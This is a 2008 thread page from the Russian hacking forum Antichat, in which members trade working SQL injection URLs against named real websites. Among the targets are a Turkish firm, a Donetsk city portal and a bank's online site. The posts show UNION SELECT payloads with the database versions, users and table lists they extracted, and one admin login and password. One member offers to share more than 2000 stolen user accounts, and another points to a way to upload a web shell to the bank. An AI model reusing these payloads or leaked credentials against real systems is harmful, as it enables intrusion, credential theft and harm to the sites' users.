ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #4931  
Старый 26.02.2008, 13:31
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.atempo.com.tr/index.php?id=-442+union+select+1,user(),3,database(),5,6,7/*
user=atempoc_aboo@localhost
database=atempoc_atempo
varsion=4.0.26-log

Последний раз редактировалось neon_fx; 26.02.2008 в 13:36..
 
Ответить с цитированием

  #4932  
Старый 26.02.2008, 13:43
wol4ara2
Новичок
Регистрация: 06.02.2008
Сообщений: 4
Провел на форуме:
34554

Репутация: 1
По умолчанию

http://fifa08.in/?site=1'
http://fifa08.in/index.php?site=1'
http://fifa08.in/printview.php?board=3&topic=1'
http://fifa08.in/index.php?site=gallery&picID=1'
http://fifa08.in/index.php?site=forum_topic&topic=1'&page=1&sort=&t ype=DESC

POST'om
POST /comments.php HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

name=1&mail=1&url=1&captcha=1&captcha_hash='&refer er=1&parentID=1&type=1&ip=1&savevisitorcomment=1


POST /index.php?site=register HTTP/1.1
Host: fifa08.in
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

nickname=1&username=1&pwd1=1&pwd2=1&mail=1&captcha =1&captcha_hash='&save=1

Скажите как вытянуть отсюда что-нибудь!!!!???
 
Ответить с цитированием

  #4933  
Старый 26.02.2008, 13:54
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от wol4ara2  

Скажите как вытянуть отсюда что-нибудь!!!!???
вопросы задаем в другом топике.. -20
=======================================
#######sql_inj#######
http://www.hanima.com/new/gcat.php?l=2&uid=70dm9ftguhnb6n5estcl76vlh1&gcat=4 +union+select+1,2,3,4,concat(version(),0x3a,user() ,0x3a,database()),6,7,8,9/*
---------------info------------
4.1.20:hanima@localhost:hanima
#######sql_inj#######
http://frvmedia.com/1-communiques.php?xlang=fr&xid=-132'+union+select+1,2,3,concat(version(),0x3a,user (),0x3a,database()),5,6,7/*
---------------info------------
5.0.45:frvmedia_admin@localhost:frvmedia_main

Последний раз редактировалось xcedz; 26.02.2008 в 14:26..
 
Ответить с цитированием

  #4934  
Старый 26.02.2008, 14:57
neon_fx
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме:
394753

Репутация: 120
По умолчанию

http://www.6seconds.org/cert/show.php?ID=-68+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,database(),22,23,24,25,26,27 ,28,version(),30,31,32,33,34,35,36,37,38,39/*

6cert@localhost 6
certlist
5.0.45-community
 
Ответить с цитированием

  #4935  
Старый 26.02.2008, 15:13
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
По умолчанию

во, млин, запарило... по работе нужно лазить по чужим сайтам с ВЕЧЕРНИМИ ПЛАТЬЯМИ и смотреть разные фишки на сайтах...
после 10-го или 15-го решил отвлечься:
результат:
http://www.solange.ru/gallery/shop.phtm?s=99999+union+select+1,VERSION(),3,4,5/*

4.1.21-standard
intermoda@83.69.224.34
intermoda
 
Ответить с цитированием

  #4936  
Старый 26.02.2008, 18:03
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

www.humanmedia.ru
Наша компания является эксклюзивным продавцом рекламного времени на тематических каналах «НТВ-Плюс». Фактически это новый инструмент рекламных коммуникаций.
version() >5 (information_schema)
Цитата:
_http://www.humanmedia.ru/page.php?id=2+and+1=-1+union+select+1,concat(0xEBEEE3E8ED202D20,login,0 x3C62723E,0xEFE0F0EEEBFC202D20,password,0x3C62723E EFF0E8E2FB202D20,priv),3,4,5,6,7,8,9,10+from+tv_ad mins
логин - nets
пароль - nets
привы - 1
Цитата:
17:tv_admins
18:tv_ban
19:tv_news
20:tv_pages
21:tv_sample
22:tv_subscribe
23:tv_subscribe_delivery
24:tv_variables
20:tv_pages
20:--1:title
20:--2:body
20:--3:description1
20:--4:description2
20:--5:description3
20:--6riority
20:--7ublic
20:--8id
20:--9:menu
17:tv_admins
17:--1:login
17:--2assword
17:--3:name
17:--4:email
17:--5riv
Админку ненашел 8( письмо админу отправил 8)
 
Ответить с цитированием

  #4937  
Старый 26.02.2008, 20:41
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
-------------------------------
5.0.37-log
life
life@localhost
-------------------------------
http://donetsk.life.dn.ua/nb/view.php?id=-5995/**/union/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,10/**/from/**/forums_auth/**/limit/**/1,1/*
-------------------------------
есть интересные таблицы: (но я их не перебирал)
board_admin_comment
f1
f1_bodies
f2
f2_bodies
f3
f3_bodies
f4
f4_bodies
f5
f5_bodies
forums
forums_auth
forums_forum2group
forums_groups
forums_moderators
forums_user2group
gal_user
guide
mail_archieve
maillist
maillist_users
poll_poll
poll_vote
prob
---------------------
если кто вытянет полную базу-киньте в личку(интересно посмотреть, а колупаться дальше влом
 
Ответить с цитированием

  #4938  
Старый 27.02.2008, 02:24
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

И снова горе веб-дизайнеры: "GiG Web solutions" Киев

Форум - Web программирование (PHP,HTML,CSS,JavaScript,ASP)

_http://gig.kiev.ua/show_message.php?conf_id=-8+union+select+1,aes_decrypt(aes_encrypt(user(),0x 71),0x71),3,4,5,6/*&upper_id=0

gigkievua_user@localhost
gigkievua_db1
5.0.41-community

ветка пятая, раскручивать не стал
КТО ИМ ДАЁТ ДЕНЕГ???
 
Ответить с цитированием

  #4939  
Старый 27.02.2008, 04:09
samarin
Участник форума
Регистрация: 24.02.2008
Сообщений: 136
Провел на форуме:
295283

Репутация: 69
Отправить сообщение для samarin с помощью ICQ
По умолчанию

Цитата:
Только учусь!
------------------------------
http://donetsk.life.dn.ua/
Комунальный портал города Донецка.
все таки решил добить сам. пользователей больше 2000 (у меня пока 700, но скоро добъю) вывод типа имя пользователя,пароль,имя,мы о,аська(оч много элитных. Хотел бы себе ) кому надо обращайтесь в личку поделюсь.
------------------------------
прошу прощенья, если не в этой теме. Не наказывайте пожалуйста
 
Ответить с цитированием

банкирЫЫЫ -)
  #4940  
Старый 27.02.2008, 13:21
x88x
Участник форума
Регистрация: 27.11.2007
Сообщений: 233
Провел на форуме:
1379382

Репутация: 378
Отправить сообщение для x88x с помощью ICQ
Exclamation банкирЫЫЫ -)

мда, все-таки решил выложить на благо родного ачата...
ВНИМАНИЕ: Сегодня у нас БАНК (точнее сайт онлайн банкинга) - дырявый как windows 98 =)

Версия мускула - 5 с хреном, соответственно, есть доступ к :
Цитата:
_http://www.mcb-bank.com/index.php?nd=menu&id=9999+union+select+1,TABLE_NAM E,3,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
Наиболее приглянувшиеся мне таблицы:
===================================

isearch_admin_log

messages
message_id
message_image
message_month
message_year
message_title

specials
id
titel
text
image
active
...

users
id
username
password
admin
lastlogin

===================================

и самое интересное - КАВЫЧКИ НЕ ФИЛЬТРУЮТСЯ ВООБЩЕ!!!
так что, есть возможность залить шелл.

Вобщем, пользуйтесь на здоровье
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ